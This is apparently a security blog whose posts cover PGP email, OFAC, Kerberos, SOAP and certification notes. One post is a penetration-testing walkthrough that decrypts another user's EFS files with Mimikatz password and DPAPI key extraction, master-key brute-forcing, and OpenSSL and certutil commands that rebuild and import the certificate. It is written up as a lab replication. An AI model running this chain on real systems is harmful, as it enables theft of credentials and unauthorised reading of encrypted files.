Saturday, 28 January 2017

Cryptography Mind Map


Sharing my Crypto Mind Map for quick reference.

Download from here

Hope this helps!

Friday, 27 January 2017

Office of Foreign Asset Control (OFAC)

Office of Foreign Asset Control (OFAC)

The Office of Foreign Assets Control (OFAC) is a financial intelligence and enforcement agency of the U.S. Treasury Department.

Financial institutions uses data/list provided by OFAC here
This OFAC  is the list of individuals, groups, and entities, such as terrorists and narcotics traffickers designated under programs that are not country-specific -

May be helpful !

Thursday, 19 January 2017

Using PGP for Gmail - (Pretty Good Privacy)

What is PGP?

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication.

PGP is often used for signing, encrypting, and decrypting texts, e-mails and increase the security of e-mail communications.

Public Key :
This key is public to everyone, you need to share your public keys with your friends, so that your friends will be able to encrypt the message and send it to you.

Private Key:
This key is private, and you should not share this key with anyone. You will be able to decrypt emails encrypted with your public keys.

For demonstration we will use - Mailvelope

Mailvelope is a crome plugin that can be used for generating public key and private key.
and also you will be able to send PGP encrypted / decrypt emails to and from your friends.


Steps :

1. Generate public and private keys with Mailvelope

2. View your public and private keys

3. Now you need to import your friends Public key so that you can encrypt confidential message and send it to him

4. Now You can compose a message and encrypt it with your friends public key
You just need to put your sender whose public key you have imported in previous step.

5. Even if other person intercepts this message he will see below contents

6. Now when your friend will open the message he will see below Mailvelope option for decrypting this message

Your friend will enter passphrase for his private key

7. Thats it! Your friend has decrypted your message with his private key.

Hope this helps!

Tuesday, 17 January 2017

Decrypting EFS encrypted Files

Recently came across scenario on decryption of EFS ( Encrypted File System) encrypted files. Encrypted File System (EFS) is a Microsoft Windows feature for encrypting files nad folders on NTFS drives.

How to encrypt a file ?
Its simple, just follow below steps,

Encrypting folder name 'Encrypt' with user 'Administrator'

Attempt to access file with user 'admin'

Now its clear, that only user who encrypted the file can decrypt it!..

In your penetration testing, you must get an administrator level access the system for decryption of EFS files.

Possible Ways,

Step 1 : Using 'Cipher' command in Windows, you can encrypt / decrypt files, view encrypted file information and use it further for your attacks, I have executed below command with user 'admin' which is administrator account on the system and found that files are encrypted by user named 'Administrator' - That's what important to us!

Using Cipher command to know information about encrypted file

Case 1 :  Once you have administrator level access to the system, I would suggest,
1.  Extract system passwords from memory with Mimikatz, and get the password for account 'Administrator' ( Password for user which encrypted the file) ,
2. Authenticate over SMB and access EFS encrypted files just like normal files . - This is of course simple trick.

Case 2 : I also tried changing 'administrator' password from account 'admin' and it works, you can just login with your new password and still be able to access EFS encrypted files - So no dependencies even if password is changed.

Case 3: What if  because of some reason, you are not able to extract windows password from system memory, or what if system access is configured via SmartCard, you may not find domain passwords/local administrator passwords in system memory.

In this case 3, it becomes a challenge, because you dont have valid password for the account 'Administrator' and hence it wont be possible to access EFS encrypted files directly even via other administrator user name 'admin'

Now in this case, there are two approaches,

1. Using 'admin' credentials attempt to execute Mimikatz::Crypto commands mentioned below
( This is quite complex process but yes you can definitely follow the steps and attempt to recover your keys )

2. Using 'admin' credentials - Install a tool "Advanced EFS Data Recovery Tool" - Its commercial      (

Using this tool, you will be able to identify EFS encrypted files throughout disk, and find following two important keys :
- Private Key
- Master Key

Private key is encrypted with Master key.
In order to decrypt this Master key we need to conduct bruteforce attack.
Usually password is -
- User account password
- Same key as a password

Here are some of the POC which I simulated in my test environment.

"Maliciousadmin" user doesnt have access to encrypted file - Create by Other user

"Malicousadmin" installs EFS recovers

Scanning for Private/Master keys and Encrypted files

Launching Bruteforce attack against Master key

Launching Bruteforce attack

Decrypted Keys - Now can be used for decrypting files

Files Decrypted with "malicioususer" 

Hope this was helpful!

Decry pt the EFS encrypted file a bit hard way :

Step 1: Login with userid "malicioususer" -

Step 2: In our scenario we need to extract keys for user "admin" who has encrypted the confidential file.
For this, we need to navigate to

"C:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<file name>

Step 3:  Running crypto:system on above file path results in generation of Public Key in a filename with extension .der

Step 4:

Encrypted Private Key

Confirming the private key 

Extracting Master Key

Decrypted Master Key

Decrypting Private key with master key

Export private key to .pvk file

Extracting Certificate

Importing Certificate and Decrypted EFS encrypted file

Path Details :  (Reference : Link )

Public Key Path :

O/P = D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der

Private Key Path :

O/P = b9fd6a85-6138-4a2b-98be-3acb31f7779b

Confirm Private Key and get master key requires Path :

O/P = {9d684db5-a8a9-4193-b364-5c270f321408}

All Required Keys :

Public Key  - D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der

Private Key - b9fd6a85-6138-4a2b-98be-3acb31f7779b

Master Key  - {9d684db5-a8a9-4193-b364-5c270f321408}

Key Extraction :
Extracting Public Keys : (Stored in .DER file )

mimikatz # crypto::system /file:"C:\Users\admin\AppData\Roaming\Microsoft\System
Certificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F" /export

Extracting Private Keys :

mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\

Extracting Master Keys :

mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec

Decrypt Master Keys : ( Password Required )

mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec
21408" /password:test@123

Decrypt Private Keys : (Store in .pvk file)

mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\
e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7" /masterkey:0f2d0b68ebd591f4feab3366a947672

Building the PFX - This requires OpenSSL v 1.x

Download from : Link

openssl x509 -inform DER -outform PEM -in C:\OpenSSL-Win32\D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der -out C:\OpenSSL-Win32\public.pem

openssl rsa -inform PVK -outform PEM -in C:\OpenSSL-Win32\raw_exchange_capi_0_b9fd6a85-6138-4a2b-98be-3acb31f7779b.pvk -out C:\OpenSSL-Win32\private.pem

openssl pkcs12 -in C:\OpenSSL-Win32\public.pem -inkey C:\OpenSSL-Win32\private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\OpenSSL-Win32\cert.pfx

Importing Certificate :

certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot

Reference :

I know its already available but wanted to replicate it on my test environment!

Hope this is helpful.

Sunday, 15 January 2017

Quick Reference

Hi All,

Adding my updated quick reference slides on following topics : Quick Reference v0.3

  1. Law systems
  2. Intellectual Property Law (IPL)
  3. International Issues
  4. Safe Harbor
  5. Wassenaar Arrangement
  6. US Laws
  7. Risk Analysis Types
  8. Asset Types

New slides on following topics,
  1. Information Classification
  2. Data Management
  3. Quality Assurance and Quality Control
  4. Data Quality
  5. International Standards
  6. CISI
  7. Degausser Devices
  8. PGP - Pretty Good Privacy
  9. TOGAF


  1. Security models
  2. Cryptography

Hope this quick references will be helpful ! 

Do let me know in case it needs to be updated. Thanks

Wednesday, 21 December 2016

Kerberos Working

Kerberos Understanding

Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. A free implementation of this protocol is available from the Massachusetts Institute of Technology

  1. Kerberos protocol has 3 key components -
    - Client  [ Users / Applications ]
    - Services
    - Key Distribution Centre (KDC)
  2. Key Distribution Centre (KDC) key components -
    - Ticket Granting Service (TGS)
    - KDC Database
    - Authentication Service

    Note :
     Users/Applications/Services also known as principle             Set of principle is called "realm"
  3. Keys Used in Kerberos Authentication :
    - Secret Keys     :  These keys are shared between KDC and Principle
    - Session Keys   :  These keys are shared between client and services i.e. principles
Overall Workflow - Client needs to access email service
  • Kerberos is single sign on technology
  • In Kerberos, client sends username to KDC
  • KDC in turn search for user in KDC database
  • If user found in KDC database, TGS creates a ticket with limited period of time and sent to client along with session key.
  • Now, if client wants to access email server, then it will create "Authenticator" message containing - Client name, IP Address, Time and encrypt it with session key (S1) provided by KDC
  • Client then sends this TGT + Authenticator encrypted with session key + Service that needs to be access (Mail service) and send it to KDC
  • KDC decrypts message, post confirmation KDC creates a "Service Ticket" and encrypts it with Service key.
  • Service ticket along with new session key (S2) is encrypted with (S1) and send it to client.
  • Client now has service ticket, however it cant be decrypted as it doesn't have service key.
  • Client encrypts authenticator with new session key (S2) and send it to Service (Email Service)
  • Once service receives message, it can decrypt the message with Service key and confirm the identity.
  • Client can have communication with service!

Kerberos Key Components

Kerberos Overall Flow - Client wants to access email service

Below are some of the best links I came across for understanding Kerberos :
Link 1
Link 2
Link 3 ( Blackhat )

Potential weaknesses in Kerberos :

  1. KDC can be single point of failure
  2. Secret keys are stored temporarily on users workstations 
  3. Session keys either reside in cache or in key table 
  4. Kerberos is vulnerable to password guessing - KDC doesn't have any mechanism to detect bruteforce attempts.
  5. Network traffic is not protected if encryption is not enabled
  6. Too short keys - vulnerable to bruteforce
  7. Kerberos needs all client and server clock to be synchronised

Hope this helps! Thanks for visiting!

Wednesday, 16 November 2016

SOAP (Simple Object Access Protocol ) - Understanding

SOAP - Simple Object Access Protocol

  1. Consider a scenario where Application A needs to communicate with Application B
  2. Application A needs to get status of credit card from Application B
  3. In this case, web service will be created on application B
  4. Irrespective of underlying technology, Application A will be able to send SOAP requests containing (Credit card no.) to Application B web service.
  5. Application B web service will process request and generate SOAP response which will be sent to Application A

Refer below diagram :

Below are actual SOAP request and response calls captured in Burpsuite :

SOAP - Youtube Video